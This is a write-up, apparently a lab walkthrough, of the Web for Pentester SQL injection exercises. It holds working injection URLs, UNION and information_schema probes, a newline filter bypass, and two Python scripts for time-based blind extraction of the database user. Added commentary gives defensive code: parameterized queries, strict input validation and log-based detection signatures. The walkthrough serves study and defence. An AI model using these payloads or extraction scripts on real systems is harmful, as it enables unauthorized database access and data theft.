web for pentester sqli
Date: 2020-09-12
- example1
`name=root`: this is clearly a string-type injection. Close the `root` string literal, then append the classic always-true condition.
http://192.168.239.134/sqli/example1.php?name=root' or '1'='1
- example2
This exercise forbids spaces. The first idea was to replace them with `/**/` comments, but `/` turns out to be filtered as well. Using `||` in place of `or` avoids the need for a space altogether.
http://192.168.239.134/sqli/example2.php?name=root'||'1'='1
- example3
The same approach as above injects successfully here too.
http://192.168.239.134/sqli/example3.php?name=root'||'1'='1
- example4
This one is a numeric injection: the same approach as above works once the `'` is dropped.
http://192.168.239.134/sqli/example4.php?id=1||1=1
- example5
Exercise 5 is the same; the answer above injects successfully, so this seems to be a fairly general approach.
http://192.168.239.134/sqli/example5.php?id=1||1=1
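Exercises 1 to 5 all come down to one defect: the `name` or `id` value is concatenated into the SQL string, so a quote plus an `or`/`||` tautology changes the query's logic, and the space/slash blacklist of exercises 2 and 3 does nothing about that. The Python below is an added illustration, not code from this page or from the Web for Pentester lab. It rebuilds the pattern against an in-memory SQLite table with an assumed schema: the string-built query returns the whole table for the exercise-1 payload, an approximation of the exercise-2/3 blacklist lets the `||` payload through, and a bound parameter returns nothing for the same input. SQLite treats `||` as string concatenation rather than OR, so the exercise-2 payload is only run through the filter here, not against the database.

```python
import re
import sqlite3

# Constructed in-memory table standing in for the lab's backend; the real
# schema is not shown on the page, so this one is an assumption.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, age INTEGER, groupname TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("root", 30, "admin"), ("alice", 25, "users"), ("bob", 40, "users")],
    )
    conn.commit()
    return conn


def blacklist_ok(value):
    # Approximation of the exercise-2/3 filter: reject spaces and slashes.
    # It never looks at quotes or at '||', so the page's payload passes.
    return re.search(r"[ /]", value) is None


def lookup_vulnerable(conn, name):
    # String concatenation: whatever is in `name` becomes SQL syntax.
    sql = f"SELECT name FROM users WHERE name='{name}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, name):
    # Bound parameter: the value is sent as data and can never close the
    # literal, so the tautology is just a very odd user name.
    rows = conn.execute("SELECT name FROM users WHERE name=?", (name,))
    return [row[0] for row in rows]


EXAMPLE1_PAYLOAD = "root' or '1'='1"    # from the page (example1)
EXAMPLE2_PAYLOAD = "root'||'1'='1"      # from the page (example2, no spaces)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input :", lookup_vulnerable(db, "root"))
    print("vulnerable, example1     :", lookup_vulnerable(db, EXAMPLE1_PAYLOAD))
    print("blacklist blocks example1:", not blacklist_ok(EXAMPLE1_PAYLOAD))
    print("blacklist blocks example2:", not blacklist_ok(EXAMPLE2_PAYLOAD))
    print("parameterized, example1  :", lookup_parameterized(db, EXAMPLE1_PAYLOAD))
```

The point of the two lookup functions sitting side by side is that the fix is not a better filter: the parameterized version accepts every character the blacklist tries to ban and still returns no rows for the payload, because the database never parses the value as SQL.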
- example6
Enumerate the number of columns
http://192.168.239.134/sqli/example6.php?id=1 order by 5
Confirm the column count
http://192.168.239.134/sqli/example6.php?id=1 union select 1,2,3,4,5
Version information
http://192.168.239.134/sqli/example6.php?id=1 union select 1,version(),4,3,5
Table names; the parameter here must end with a digit, which is why the query ends in `where 1=1`
http://192.168.239.134/sqli/example6.php?id=1 union select 1,table_name,4,3,5 from information_schema.TABLES where 1=1
- example7
The check here is a single-line match, so a `%0A` newline is inserted and the injection follows it
example7.php?id=2%0AOrder%20by%206
Using the statement above, the column count is found to be 6
example7.php?id=2%0Aunion%20select%201,2,3,4,5
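Exercises 6 and 7 show two weak input checks on `id`: one that only requires the value to end in digits, and one whose `^...$` anchors apply per line, so a `%0A` newline puts the payload on a second line the anchors never examine. The Python below is an added example, not code from the page or the lab; the page does not show the exact PHP checks, so the two weak regexes are assumed approximations of them. It runs the page's two decoded payloads through both weak checks and through a whole-value check that rejects them.

```python
import re
from urllib.parse import unquote

# The page's two payloads, decoded the way the web server hands them to PHP.
EXAMPLE6_ID = "1 union select 1,table_name,4,3,5 from information_schema.TABLES where 1=1"
EXAMPLE7_ID = unquote("2%0Aunion%20select%201,2,3,4,5")   # "2\nunion select 1,2,3,4,5"


def check_ends_with_digit(value):
    # Assumed exercise-6 style check: only the end of the value must be numeric,
    # so anything at all may come before the trailing digits.
    return re.search(r"[0-9]+$", value) is not None


def check_per_line_anchor(value):
    # Assumed exercise-7 style check: ^ and $ are applied per line (MULTILINE),
    # so a numeric first line satisfies the pattern even when a second line
    # carries the injected SQL.
    return re.search(r"^[0-9]+$", value, re.MULTILINE) is not None


def check_whole_value(value):
    # Hardened check: the entire string must be digits. fullmatch has no
    # per-line anchoring and, unlike $, does not tolerate a trailing newline.
    return re.fullmatch(r"[0-9]+", value) is not None


def parse_id(value):
    # What the handler should do with the result: reject anything that is not a
    # plain integer and pass the integer on as a bound query parameter.
    return int(value) if check_whole_value(value) else None


if __name__ == "__main__":
    for label, payload in (("example6", EXAMPLE6_ID), ("example7", EXAMPLE7_ID), ("normal", "42")):
        print(label,
              "ends-with-digit:", check_ends_with_digit(payload),
              "per-line-anchor:", check_per_line_anchor(payload),
              "whole-value:", check_whole_value(payload))
```

Note that even a single-line `$` is not enough on its own: in Python, as in PCRE, `$` matches before a final newline, so `"42\n"` passes `[0-9]+$` while `fullmatch` rejects it. Converting to an integer and binding it as a parameter removes the dependence on the regex entirely.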
- example8
The `order` parameter suggests the value is appended at the tail of the query
http://192.168.239.135/sqli/example8.php?order=id`%20desc--+
That guess was correct. Because the wanted information cannot be read back from the page output, only time-based blind injection is possible.
The extraction script follows:
```python
import requests

"""
Generic time-based (delay) injection model
"""
upper_char = range(65, 91)    # 26 uppercase letters A-Z
lower_char = range(97, 123)   # 26 lowercase letters a-z
number = range(48, 58)        # digits 0-9 (range end is exclusive)
other = ["_", '.', '@']


def get_char():
    # Candidate byte values, all as integers so they compare against ascii()
    return list(upper_char) + list(lower_char) + list(number) + [ord(i) for i in other]


def httpReq(url, timeout=5):
    # A request that exceeds the timeout means the sleep() branch was taken
    try:
        requests.get(url, timeout=timeout)
        return False
    except requests.exceptions.ReadTimeout:
        return True


def get_length():
    length = 1
    while length < 30:
        url = f'''http://192.168.239.135/sqli/example8.php?order=id` And If(length(user())={length},sleep(11),1) --+'''
        status = httpReq(url)
        if status:
            print(f"Length: {length}")
            return length
        length += 1
    print("Could not determine the length")


# get_length()


def dismantling(length):
    default = ["*"] * length
    for index in range(length):   # positions 0..length-1; length+1 would run past the list
        for ch in get_char():
            url = f'''http://192.168.239.135/sqli/example8.php?order=id` And If(ascii(SUBSTRING(user(),{index+1},1))={ch},sleep(11),1) --+'''
            print(url)
            status = httpReq(url)
            if status:
                default[index] = chr(ch)
                print(default)
                break
    print(default)
    print(f"dismantling:{default}")


length = get_length()
if length:
    dismantling(length)
```
output:
dismantling:['p', 'e', 'n', 't', 'e', 's', 't', 'e', 'r', 'l', 'a', 'b', '@', 'l', 'o', 'c', 'a', 'l', 'h', 'o', 's', 't']
- example9
Same as exercise 8, time-based injection works here too (the submitted value is not wrapped in backticks, so there is no closing problem to deal with)
Payload
http://192.168.239.135/sqli/example9.php?order=name%20and(%20select(sleep(5)))
Script:
```python
import requests

"""
Generic time-based (delay) injection model
"""
upper_char = range(65, 91)    # 26 uppercase letters A-Z
lower_char = range(97, 123)   # 26 lowercase letters a-z
number = range(48, 58)        # digits 0-9 (range end is exclusive)
other = ["_", '.', '@']


def get_char():
    # Candidate byte values, all as integers so they compare against ascii()
    return list(upper_char) + list(lower_char) + list(number) + [ord(i) for i in other]


def httpReq(url, timeout=5):
    # A request that exceeds the timeout means the sleep() branch was taken
    try:
        requests.get(url, timeout=timeout)
        return False
    except requests.exceptions.ReadTimeout:
        return True


def get_length():
    length = 1
    while length < 30:
        url = f'''http://192.168.239.135/sqli/example9.php?order=id And If(length(user())={length},sleep(11),1) --+'''
        status = httpReq(url)
        if status:
            print(f"Length: {length}")
            return length
        length += 1
    print("Could not determine the length")


# get_length()


def dismantling(length):
    default = ["*"] * length
    for index in range(length):   # positions 0..length-1; length+1 would run past the list
        for ch in get_char():
            url = f'''http://192.168.239.135/sqli/example9.php?order=id And If(ascii(SUBSTRING(user(),{index+1},1))={ch},sleep(11),1) --+'''
            print(url)
            status = httpReq(url)
            if status:
                default[index] = chr(ch)
                print(default)
                break
    print(default)
    print(f"dismantling:{default}")


length = get_length()
if length:
    dismantling(length)
```
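Seen from the server side, the time-based extraction of exercises 8 and 9 leaves a distinctive trail: many requests to one endpoint from one source, each carrying a `sleep()`/`If()` expression in the query string, with the response time jumping to the sleep duration whenever a guess is right. The Python below is an added example, not code from the page or the lab. It scans constructed access-log lines (a simplified combined format with an assumed trailing response-time field in milliseconds; the lab itself does not log this) for the page's payload patterns, URL-decoding the query so `%0A` and `%20` are compared in decoded form, and separately counts per-source request bursts against a single path.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed log lines (not real lab output): simplified combined format with
# an assumed trailing response time in milliseconds. The query strings are the
# page's example2/7/8 payloads, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
192.168.239.1 - - [12/Sep/2020:10:00:01 +0000] "GET /sqli/example8.php?order=id HTTP/1.1" 200 512 12
192.168.239.1 - - [12/Sep/2020:10:00:02 +0000] "GET /sqli/example8.php?order=id%60%20And%20If(length(user())=22,sleep(11),1)%20--+ HTTP/1.1" 200 512 11004
192.168.239.1 - - [12/Sep/2020:10:00:14 +0000] "GET /sqli/example8.php?order=id%60%20And%20If(ascii(SUBSTRING(user(),1,1))=112,sleep(11),1)%20--+ HTTP/1.1" 200 512 11007
192.168.239.1 - - [12/Sep/2020:10:00:26 +0000] "GET /sqli/example2.php?name=root'||'1'='1 HTTP/1.1" 200 900 9
192.168.239.1 - - [12/Sep/2020:10:00:27 +0000] "GET /sqli/example7.php?id=2%0Aunion%20select%201,2,3,4,5 HTTP/1.1" 200 700 8
10.0.0.7 - - [12/Sep/2020:10:01:00 +0000] "GET /sqli/example1.php?name=root HTTP/1.1" 200 500 7
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$'
)

# Patterns matched against the decoded, lower-cased, whitespace-collapsed query.
SIGNATURES = {
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "union_select": re.compile(r"\bunion\s+select\b"),
    "tautology": re.compile(r"'\s*(?:or|\|\|)\s*'"),
    "schema_probe": re.compile(r"\binformation_schema\b"),
    "trailing_comment": re.compile(r"(?:--|#)\s*$"),
}
SLOW_MS = 5000   # well below the lab's sleep(11), well above a normal response


def parse_line(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # Decode %XX and '+' so %0A newlines and %20 spaces are seen the way the
    # database would see them.
    rec["query"] = unquote_plus(parts.query)
    rec["ms"] = int(rec["ms"])
    return rec


def classify(query):
    """Names of the signatures that match a decoded query string."""
    norm = re.sub(r"\s+", " ", query.lower()).strip()
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]


def scan(log_text, slow_ms=SLOW_MS):
    """One alert per suspicious request: matched signatures plus a slow flag."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        sigs = classify(rec["query"])
        if rec["ms"] >= slow_ms:
            sigs.append("slow_response")
        if sigs:
            alerts.append({"ip": rec["ip"], "path": rec["path"],
                           "query": rec["query"], "signatures": sigs})
    return alerts


def burst_sources(log_text, threshold=50):
    """(ip, path) pairs with at least `threshold` requests; character-by-
    character blind extraction needs many requests against one endpoint."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            counts[(rec["ip"], rec["path"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["ip"], alert["path"], alert["signatures"])
    print(burst_sources(SAMPLE_LOG, threshold=3))
```

The burst threshold is deliberately low here because the sample has six lines; against real traffic it should sit above what one user produces on a single page in the same window, and the signature list is a starting point rather than a complete grammar, which is why the slow-response flag and the per-source count are kept as independent signals.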